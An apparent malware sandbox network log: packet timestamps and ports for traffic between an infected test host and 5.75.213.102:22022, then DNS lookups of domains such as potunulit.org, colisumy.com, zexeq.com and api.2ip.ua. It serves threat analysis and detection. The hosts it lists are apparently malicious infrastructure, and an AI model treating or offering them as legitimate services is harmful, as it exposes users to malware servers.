Jun 21, 2023 04:28:03.106811047 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.106846094 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.106870890 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.106875896 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.106934071 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.106969118 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.106997967 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107000113 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107068062 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107084036 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107157946 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107197046 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107250929 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107295990 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107331991 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107361078 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107418060 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107419968 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107419968 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107482910 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107501030 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107549906 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107597113 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107618093 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107661963 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107692957 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107721090 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107728004 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107788086 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107789040 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107858896 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107924938 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.107944965 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.107992887 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108007908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108007908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108047009 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108051062 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108099937 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108136892 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108154058 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108158112 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108210087 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108217001 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108292103 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108294010 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108374119 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108387947 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108429909 CEST	49725	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:28:03.108443975 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108481884 CEST	443	49725	103.233.24.19	192.168.2.3
Jun 21, 2023 04:28:03.108500957 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108503103 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108556032 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108561039 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108603001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108654976 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108671904 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108711958 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108761072 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108776093 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108819962 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.108819962 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108867884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108922958 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108973980 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.108990908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109061003 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109119892 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109174013 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109174013 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109180927 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109204054 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109236002 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109252930 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109287977 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109339952 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109353065 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109390974 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109443903 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109450102 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109498978 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109499931 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109545946 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109596014 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109610081 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109647036 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109702110 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109702110 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109760046 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109810114 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109860897 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109915972 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.109924078 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.109966993 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.110023975 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.125997066 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.126099110 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132421970 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132467031 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132513046 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132565975 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132565975 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132565975 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132611990 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132633924 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132636070 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132685900 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132694960 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132733107 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132738113 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132790089 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132801056 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132854939 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.132910013 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132961035 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.132963896 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133007050 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133019924 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133055925 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133060932 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133097887 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133116961 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133147001 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133152008 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133192062 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133197069 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133239031 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133249998 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133281946 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133304119 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133330107 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133332014 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133378029 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133383989 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133424044 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133440971 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133471012 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133476019 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133517981 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133523941 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133567095 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133568048 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133614063 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133621931 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133663893 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133666992 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133711100 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133717060 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133758068 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133770943 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133804083 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133806944 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133851051 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.133861065 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133913040 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.133975983 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134022951 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134031057 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134071112 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134076118 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134116888 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134131908 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134166002 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134174109 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134212971 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134223938 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134258032 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134265900 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134305954 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134310007 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134349108 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134366035 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134394884 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134411097 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134443998 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134445906 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134489059 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134496927 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134535074 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134547949 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134578943 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134607077 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134627104 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134630919 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134665966 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134708881 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134722948 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134752035 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134794950 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134810925 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134841919 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134855032 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134882927 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134921074 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.134943962 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.134963989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135025024 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135086060 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135129929 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135139942 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135171890 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135212898 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135234118 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135257006 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135298014 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135314941 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135343075 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135350943 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135385036 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135430098 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135449886 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135472059 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135514021 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135530949 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135560989 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135567904 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135601997 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135643005 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135654926 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135685921 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135731936 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135736942 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135780096 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135783911 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135819912 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135860920 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135874987 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135904074 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135947943 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.135966063 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135993958 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.135997057 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136034966 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136092901 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136177063 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136218071 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136257887 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136303902 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136321068 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136331081 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136363983 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136406898 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136420965 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136450052 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136492014 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136508942 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136538029 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136560917 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136580944 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136625051 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136635065 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136667013 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136708975 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136722088 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136756897 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136759996 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136796951 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136841059 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136852026 CEST	49727	22022	192.168.2.3	5.75.213.102
Jun 21, 2023 04:28:03.136883974 CEST	22022	49727	5.75.213.102	192.168.2.3
Jun 21, 2023 04:28:03.136924982 CEST	22022	49727	5.75.213.102	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 21, 2023 04:27:34.064905882 CEST	192.168.2.3	8.8.8.8	0x2faf	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:34.438199997 CEST	192.168.2.3	8.8.8.8	0x679a	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:37.578382969 CEST	192.168.2.3	8.8.8.8	0xae73	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.118005991 CEST	192.168.2.3	8.8.8.8	0xcfdd	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:38.583039045 CEST	192.168.2.3	8.8.8.8	0x36f1	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:40.713332891 CEST	192.168.2.3	8.8.8.8	0x8603	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.035057068 CEST	192.168.2.3	8.8.8.8	0xb70	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.071485043 CEST	192.168.2.3	8.8.8.8	0xa9f1	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:42.571305037 CEST	192.168.2.3	8.8.8.8	0xeea8	Standard query (0)	astoriaresidency.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:44.319489002 CEST	192.168.2.3	8.8.8.8	0x69c9	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:44.362401009 CEST	192.168.2.3	8.8.8.8	0x1915	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:47.511054039 CEST	192.168.2.3	8.8.8.8	0x23de	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:47.538062096 CEST	192.168.2.3	8.8.8.8	0x2a2c	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:47.811505079 CEST	192.168.2.3	8.8.8.8	0x3524	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.537237883 CEST	192.168.2.3	8.8.8.8	0xd48b	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.916865110 CEST	192.168.2.3	8.8.8.8	0xb63c	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:48.918086052 CEST	192.168.2.3	8.8.8.8	0x68f1	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:49.100220919 CEST	192.168.2.3	8.8.8.8	0x6b2	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:49.956052065 CEST	192.168.2.3	8.8.8.8	0x68f1	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:50.916861057 CEST	192.168.2.3	8.8.8.8	0x62c1	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:51.341531992 CEST	192.168.2.3	8.8.8.8	0x68f1	Standard query (0)	zexeq.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:53.706053972 CEST	192.168.2.3	8.8.8.8	0x3e6b	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:56.092585087 CEST	192.168.2.3	8.8.8.8	0xf2e	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:27:56.171437025 CEST	192.168.2.3	8.8.8.8	0xcace	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.128314018 CEST	192.168.2.3	8.8.8.8	0x99ac	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.407481909 CEST	192.168.2.3	8.8.8.8	0x11a9	Standard query (0)	astoriaresidency.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:01.449150085 CEST	192.168.2.3	8.8.8.8	0x756e	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:04.694288015 CEST	192.168.2.3	8.8.8.8	0xdbc0	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:05.563551903 CEST	192.168.2.3	8.8.8.8	0x3ac6	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:12.793229103 CEST	192.168.2.3	8.8.8.8	0x272d	Standard query (0)	potunulit.org	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.012516975 CEST	192.168.2.3	8.8.8.8	0x6018	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.780203104 CEST	192.168.2.3	8.8.8.8	0x4cf9	Standard query (0)	colisumy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:13.966573000 CEST	192.168.2.3	8.8.8.8	0x58ed	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:14.622798920 CEST	192.168.2.3	8.8.8.8	0x339e	Standard query (0)	toobussy.com	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:15.406846046 CEST	192.168.2.3	8.8.8.8	0xbdce	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Jun 21, 2023 04:28:15.631854057 CEST	192.168.2.3	8.8.8.8	0x57a7	Standard query (0)	shsplatform.co.uk	A (IP address)	IN (0x0001)	false
